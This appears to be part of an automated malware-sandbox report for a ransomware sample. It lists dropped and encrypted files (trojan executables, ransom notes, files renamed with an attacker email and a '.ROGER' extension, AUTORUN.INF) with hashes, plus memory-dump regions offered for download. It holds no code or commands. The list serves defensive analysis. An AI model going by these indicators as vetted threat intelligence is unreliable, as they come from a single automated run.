d267925ba1b6992041524e5c41de1e790db5cfbd

SHA256
493256859f821fdc95d26718e83555978d52873f520d0421d0c8e7748ae23c44

SHA512
1faa5afe23e46d12764b9d86067cde37e861007ec89f38af187327c492c7b672bc88161eb30d01abc1e55aa6d4db0ef7b1e9699cf680ff024be237648b58192e

Download Submit
C:\Users\Admin\Desktop\00382\HEUR-Trojan-Ransom.Win32.Encoder.gen-03a67850c7e515031147a1719e6b939101614c9cb8e18842b795622e6d6c416d.exe

Filesize
201KB

MD5
a97f395f6386a8dcb294037e8969aa98

SHA1
c8738fc6972202b1f09595f1bdfe072778f47a2c

SHA256
03a67850c7e515031147a1719e6b939101614c9cb8e18842b795622e6d6c416d

SHA512
15469a4ed11f065f1dac5ebbfbcb4f22af454c0376aacc585303c14f8f19292a8ad1e2cc034ad46dd17772c1bf29b394f04698e4d45e5b85d9b309fbb3c1e118

Download Submit
C:\Users\Admin\Desktop\00382\HEUR-Trojan-Ransom.Win32.Generic-cd1b5ff1bafb617d314c182091ab7e20f076e0fed5ddf3318b58aa3f3b342c74.exe

Filesize
709KB

MD5
26ddd3e6030f797640728bdb09e26c7f

SHA1
17ef0af56452ae945bad2624c84462a8cd70b22b

SHA256
cd1b5ff1bafb617d314c182091ab7e20f076e0fed5ddf3318b58aa3f3b342c74

SHA512
9664934907ae1ff018ecde7eb8f1f5e055cb632e3c30938842f99e816614262a98b322da5fef4b1b39f3b2295ae5ba63b7a4ed5a13173d900160370b8f2a8213

Download Submit
C:\Users\Admin\Desktop\00382\Setting\Ventas.ini

Filesize
364B

MD5
5eda24465dd995582cf1a477082c651d

SHA1
ad776f07d95fde9f851a7dbbdcc3fa72da883bde

SHA256
320de3fe36f118670693bddd36d3ae43a3d2b06c88976a4f573a88eda365e6d3

SHA512
56d5db4430321220313bd129298bbee6d033ea1b53384cd461dcd690a386b12920ce38ae554f49145433323f4807bd7aa3fb5e784219d0258386ce02c708a062

Download Submit
C:\Users\Admin\Desktop\00382\base 4 mayo 20.sql

Filesize
420KB

MD5
d46b662655a567c390af9394b4ff13a7

SHA1
4418c73796451eac41d8cbf559bd3e65a3446b5e

SHA256
0b3587a065f1b2da5ea20e86cdd9e813af392c261b10188f43e3dd24787317da

SHA512
a9375aa27b1230f465e9935580e5a2b1d4a614ef9c899032da4fbbfbe8e145e5a5b1ad713e4d0336a574efa557731ac91ca0903b52393990a57279659b7d4587

Download Submit
C:\Users\Admin\Desktop\00382\newex.ocx

Filesize
92KB

MD5
d11ab2b32354d3378d7543eceaf83554

SHA1
de793c22f7078f0d62ac32008205d446a3d4e14d

SHA256
1c5483c1065a2b5a222858e301fc624f76b961c17ddf0b6f2dc285019c1a2d07

SHA512
e1afdd2a0647b5a2f169ff11a3cacfe5bfa6143b6bc4a5830306ab128582ab9cfd2bc961884ac5f740be918938ec35b5a6f7b56e4e3f1da81be9bb4d9282044e

Download Submit
C:\Users\Admin\Documents\OneNote Notebooks\My Notebook\A4AA9-Readme.txt

Filesize
8KB

MD5
bfddbabbe125d07891cc6b49545cd4b0

SHA1
887f1ecaadb1c46f0a77a24146cae7e882d28907

SHA256
17e43a8e4385f68993304ae079c9996bbbc0f9207c3d95d485ab421124731a89

SHA512
22e4050b4925a27242e35d2512b9a6e0641a22acbb6d942d05fa1a2a12c88ece5dabd502fd1f903365c2de45e1ec08250aab70598f5fc7c7aa8fcd3afe789b57

Download Submit
C:\Users\Admin\Music\ResizeInitialize.cmd.id-7B736861.[[email protected]].ROGER

Filesize
2.5MB

MD5
4cbbcbf60da18404b033e416b784e57f

SHA1
c8b6e4223f1603a6d4b3cfc5ef6c69f1f508135f

SHA256
8599a33652996dac5471fccde367d1f1739be52e8a99ea9913488e2c4018dcef

SHA512
ae8246fd321967770c969fd8806ff121ce8fb43b4edc5e34be806d2647f278527c016bf9df2c130cdc34f80f40bcb5c8a3460055330c71b990651cef4cc234fe

Download Submit
C:\Users\Admin\RDP6\ConnectionClient.exe

Filesize
1.4MB

MD5
b2a8e43e509defe92024eaa54f5f659e

SHA1
623e425470ed23bd153c7c213408cdbbcf362686

SHA256
418ad7327e5ce8e84ef169c6b24014632da5640ffbee4f46e621ce1d726fe3c9

SHA512
57d36ba1710957f53123554efa03ed3713d54feff5a2d975fd14a5baee6dd00aee02564c57dc25bd25ffe6eccab18228866d6bfed35df5ab662f29815ce4628f

Download Submit
C:\Windows\Installer\MSI2897.tmp

Filesize
181KB

MD5
0c80a997d37d930e7317d6dac8bb7ae1

SHA1
018f13dfa43e103801a69a20b1fab0d609ace8a5

SHA256
a5dd2f97c6787c335b7807ff9b6966877e9dd811f9e26326837a7d2bd224de86

SHA512
fe1caef6d727344c60df52380a6e4ab90ae1a8eb5f96d6054eced1b7734357ce080d944fa518cf1366e14c4c0bd9a41db679738a860800430034a75bb90e51a5

Download Submit
C:\Windows\SysWOW64\notepad.exe.exe

Filesize
978KB

MD5
d06a6fff08a4175efd1f333767063d5d

SHA1
e31b30bc21d43a6d75054624d7b6decb0e954ba9

SHA256
b059929b103d74914f32624393cbaa64fcb527e981299057686a43db841d22b2

SHA512
9eb78ee934436ec2b3828b401ade5f63aef0c72056e7d4bb9e3803ee07d9dbbfe4aa84c30a716ea63ac77d74c1ba01666cfb8e5194d38ae54faf44cfc645e0bd

Download Submit
F:\AUTORUN.INF

Filesize
145B

MD5
ca13857b2fd3895a39f09d9dde3cca97

SHA1
8b78c5b2ec97c372ebdcef92d14b0998f8dd6dd0

SHA256
cfe448b4506a95b33b529efa88f1ac704d8bdf98a941c065650ead27609318ae

SHA512
55e5b5325968d1e5314527fb2d26012f5aae4a1c38e305417be273400cb1c6d0c22b85bddb501d7a5720a3f53bb5caf6ada8a7894232344c4f6c6ef85d226b47

Download Submit
\Device\HarddiskVolume1\$RECYCLE.BIN\S-1-5-21-4050598569-1597076380-177084960-1000\desktop.ini

Filesize
129B

MD5
a526b9e7c716b3489d8cc062fbce4005

SHA1
2df502a944ff721241be20a9e449d2acd07e0312

SHA256
e1b9ce9b57957b1a0607a72a057d6b7a9b34ea60f3f8aa8f38a3af979bd23066

SHA512
d83d4c656c96c3d1809ad06ce78fa09a77781461c99109e4b81d1a186fc533a7e72d65a4cb7edf689eeccda8f687a13d3276f1111a1e72f7c3cd92a49bce0f88

Download Submit
\Device\HarddiskVolume1\AUTORUN.INF

Filesize
141B

MD5
9005588d5c36246914d00b7756197191

SHA1
15d77c43ed7196619dddc2d7351d21e7a675316c

SHA256
ef0bdb4c9f3c20949240953a3219cede291581248964bc2d71c4618b75dc4989

SHA512
7587b1f8b48c24ab16b7b2b193e48ce265a72bcad6afa7b4f7914645207ee3bc7e899519a00b185a8c9546d40549305a552a2a2fe324e94f7bcb29f76e1c0a55

Download Submit
\Device\HarddiskVolume1\FILES ENCRYPTED.txt

Filesize
184B

MD5
70efd6a3738b5294e321a2ef0b40e3e2

SHA1
f08a21a88ab2b59c449fb2b9b812f8e8ca2ee7c8

SHA256
a5d03bf60a6bc7ff9602a2f73a3d8fb695941538aba7bcbce10c0c75aa5e9fd7

SHA512
b318983844b4c7cd9b63cde042c5c251dcc25865947f930ea46ff60b5639c1196c3213a0d2f27c29ab9365996d118cde42b29320253d41095449dac2e170c675

Download Submit
memory/736-94-0x0000026C351F0000-0x0000026C3520E000-memory.dmp

Filesize
120KB

Download
memory/736-92-0x0000026C35250000-0x0000026C352C6000-memory.dmp

Filesize
472KB

Download
memory/736-91-0x0000026C35180000-0x0000026C351C4000-memory.dmp

Filesize
272KB

Download
memory/736-81-0x0000026C34100000-0x0000026C34122000-memory.dmp

Filesize
136KB

Download
memory/1312-1056-0x0000000000400000-0x0000000000469000-memory.dmp

Filesize
420KB

Download
memory/1312-334-0x0000000000400000-0x0000000000469000-memory.dmp

Filesize
420KB

Download
memory/1312-1058-0x0000000063140000-0x000000006314B000-memory.dmp

Filesize
44KB

Download
memory/1312-1057-0x0000000064540000-0x000000006454A000-memory.dmp

Filesize
40KB

Download
memory/1312-999-0x0000000064540000-0x000000006454A000-memory.dmp

Filesize
40KB

Download
memory/1312-1000-0x0000000063140000-0x000000006314B000-memory.dmp

Filesize
44KB

Download
memory/1312-963-0x0000000000400000-0x0000000000469000-memory.dmp

Filesize
420KB

Download
memory/1312-995-0x0000000000400000-0x0000000000469000-memory.dmp

Filesize
420KB

Download
memory/1312-1149-0x0000000000400000-0x0000000000469000-memory.dmp

Filesize
420KB

Download
memory/2140-1351-0x0000000000400000-0x0000000000A24000-memory.dmp

Filesize
6.1MB

Download
memory/2256-962-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/2256-286-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/2256-112-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/2256-148-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/2432-61-0x000001CC05E00000-0x000001CC05E01000-memory.dmp

Filesize
4KB

Download
memory/2432-64-0x000001CC05E00000-0x000001CC05E01000-memory.dmp

Filesize
4KB

Download
memory/2432-60-0x000001CC05E00000-0x000001CC05E01000-memory.dmp

Filesize
4KB

Download
memory/2432-63-0x000001CC05E00000-0x000001CC05E01000-memory.dmp

Filesize
4KB

Download
memory/2432-54-0x000001CC05E00000-0x000001CC05E01000-memory.dmp

Filesize
4KB

Download
memory/2432-62-0x000001CC05E00000-0x000001CC05E01000-memory.dmp

Filesize
4KB

Download
memory/2432-59-0x000001CC05E00000-0x000001CC05E01000-memory.dmp

Filesize
4KB

Download
memory/2432-53-0x000001CC05E00000-0x000001CC05E01000-memory.dmp

Filesize
4KB

Download
memory/2432-52-0x000001CC05E00000-0x000001CC05E01000-memory.dmp

Filesize
4KB

Download
memory/2432-58-0x000001CC05E00000-0x000001CC05E01000-memory.dmp

Filesize
4KB

Download
memory/2672-253-0x000001D114E00000-0x000001D114EB8000-memory.dmp

Filesize
736KB

Download
memory/2732-307-0x000000006ECE0000-0x000000006F23F000-memory.dmp

Filesize
5.4MB

Download
memory/2944-996-0x0000000000E20000-0x0000000000E3B000-memory.dmp

Filesize
108KB

Download
memory/3512-255-0x0000000005200000-0x0000000005292000-memory.dmp

Filesize
584KB

Download
memory/3512-246-0x0000000005A30000-0x0000000005FD4000-memory.dmp

Filesize
5.6MB

Download
memory/3512-1008-0x0000000005480000-0x0000000005498000-memory.dmp

Filesize
96KB

Download
memory/3512-1011-0x00000000059C0000-0x0000000005A26000-memory.dmp

Filesize
408KB

Download
memory/3512-2439-0x00000000067E0000-0x0000000006830000-memory.dmp

Filesize
320KB

Download
memory/3512-8426-0x0000000005030000-0x000000000503A000-memory.dmp

Filesize
40KB

Download
memory/3512-318-0x0000000005520000-0x00000000055BC000-memory.dmp

Filesize
624KB

Download
memory/3512-141-0x0000000000400000-0x0000000000450000-memory.dmp

Filesize
320KB

Download
memory/3600-109-0x0000000000DD0000-0x000000000198A000-memory.dmp

Filesize
11.7MB

Download
memory/3960-1389-0x00000000007C0000-0x00000000007DB000-memory.dmp

Filesize
108KB

Download
memory/3960-1388-0x00000000007C0000-0x00000000007DB000-memory.dmp

Filesize
108KB

Download
memory/4044-1009-0x0000000002EC0000-0x0000000002EC1000-memory.dmp

Filesize
4KB

Download
memory/4176-1054-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/4176-3890-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/4176-993-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/4176-5490-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/4176-1407-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/4176-1362-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/4176-1129-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/4176-1068-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/4176-2145-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/4424-127-0x00000000001B0000-0x0000000000226000-memory.dmp

Filesize
472KB

Download
memory/4424-133-0x0000000004B50000-0x0000000004BA8000-memory.dmp

Filesize
352KB

Download
memory/4812-102-0x000000001BA90000-0x000000001BAD4000-memory.dmp

Filesize
272KB

Download
memory/4812-101-0x0000000000F80000-0x0000000000FA6000-memory.dmp

Filesize
152KB

Download
memory/5336-3166-0x0000000000400000-0x0000000002258000-memory.dmp

Filesize
30.3MB

Download
memory/5452-4987-0x0000000000400000-0x0000000000BF3000-memory.dmp

Filesize
7.9MB

Download
memory/5452-1409-0x0000000000400000-0x0000000000BF3000-memory.dmp

Filesize
7.9MB

Download
memory/5452-2152-0x0000000000400000-0x0000000000BF3000-memory.dmp

Filesize
7.9MB

Download
memory/5452-4123-0x0000000000400000-0x0000000000BF3000-memory.dmp

Filesize
7.9MB

Download
memory/5700-1425-0x0000000000400000-0x000000000051F000-memory.dmp

Filesize
1.1MB

Download
memory/6472-3367-0x0000000000400000-0x0000000000415000-memory.dmp

Filesize
84KB

Download
memory/6472-5174-0x0000000000400000-0x0000000000415000-memory.dmp

Filesize
84KB

Download
memory/6572-6826-0x0000000004E00000-0x0000000004F92000-memory.dmp

Filesize
1.6MB

Download
memory/6572-6256-0x0000000004FA0000-0x0000000005132000-memory.dmp

Filesize
1.6MB

Download
memory/6572-7191-0x0000000004E00000-0x0000000004F8B000-memory.dmp

Filesize
1.5MB

Download
memory/9424-13694-0x0000000000CF0000-0x0000000000D4A000-memory.dmp

Filesize
360KB

Download
memory/11696-64051-0x0000000000400000-0x0000000000412000-memory.dmp

Filesize
72KB

Download
memory/18852-71522-0x0000000000400000-0x0000000000412000-memory.dmp

Filesize
72KB

Download
memory/18852-71630-0x0000000000400000-0x0000000000412000-memory.dmp

Filesize
72KB

Download